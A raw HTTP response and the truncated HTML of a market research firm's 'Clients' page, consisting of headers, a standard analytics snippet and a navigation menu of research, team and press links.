Set-Cookie: PHPSESSID=nijsk2230c9jq8i5d39hc8j9c0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Clients</title><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> 
<div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a 
href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class=&q